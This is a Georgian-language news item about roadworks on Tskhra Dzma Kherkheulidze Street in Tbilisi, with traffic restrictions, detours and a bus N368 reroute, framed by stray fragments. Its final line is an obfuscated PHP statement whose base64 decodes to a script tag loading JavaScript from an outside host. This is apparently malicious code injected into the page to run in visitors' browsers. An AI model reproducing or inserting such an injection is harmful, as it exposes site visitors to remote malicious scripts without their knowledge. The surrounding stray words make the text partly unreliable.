celsiusi
ავერსი საქკაბელი

ცხრა ძმა ხერხეულიძის ქუჩაზე დაგეგმილი საგზაო სამუშაოების გამო, რომელიც 31 ოქტომბრიდან 5 დეკემბრის ჩათვლით იწარმოებს, ავტომობილების გადაადგილება შეიზღუდება.

თბილისის მერიის ინფორმაციით, შეზღუდვა შეეხება ცხრა ძმა ხერხეულიძის მოედნიდან ცხრა ძმა ხერხეულიძის, სამურზაყანოსა და სალხინოს ქუჩების კვეთამდე არსებულ საგზაო მონაკვეთს. სამუშაოების პერიოდში ავტომობილები გადაადგილებას შეძლებენ ცხრა ძმა ხერხეულიძის მოედნიდან ცხრა ძმა ხერხეულიძის, სამურზაყანოსა და სალხინოს ქუჩების კვეთამდე, ხოლო ცხრა ძმა ხერხეულიძის, სამურზაყანოსა და სალხინოს ქუჩების კვეთიდან ავტოსატრანსპორტო საშუალებები ცხრა ძმა ხერხეულიძის მოედნის მიმართულებით გადაადგილებას შეძლებენ ცხრა ძმა ხერხეულიძის მეორე შესახვევის, პეტრე მამრაძის ხევის, აფხაზეთის ქუჩისა და სამურზაყანოს ქუჩის გამოყენებით.

რაც შეეხება საზოგადოებრივ ტრანსპორტს, N368 ავტობუსი, ცხრა ძმა ხერხეულიძის ქუჩიდან სალხინოს ქუჩის გავლის ნაცვლად, მოძრაობას გააგრძელებს აბაშის ქუჩის მიმართულებით, ხოლო ლებარდეს, დავით გივიშვილის, სენაკის, ასხინისა და ცაიშის ქუჩების გავლით დაუკავშირდება სალხინოს ქუჩას. ბოლო გაჩერებად განისაზღვრება ცხრა ძმის ქ. N147. უკუმიმართულებით მოძრაობისას ავტობუსი ცხრა ძმის ქ. N147-დან სალხინოს, თეკლათის, ლებარდესა და აბაშის ქუჩების გავლით დაუკავშირდება ცხრა ძმა ხერხეულიძის ქუჩას და იმოძრავებს დადგენილი სქემით სადგურის მოედნისკენ.

252
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");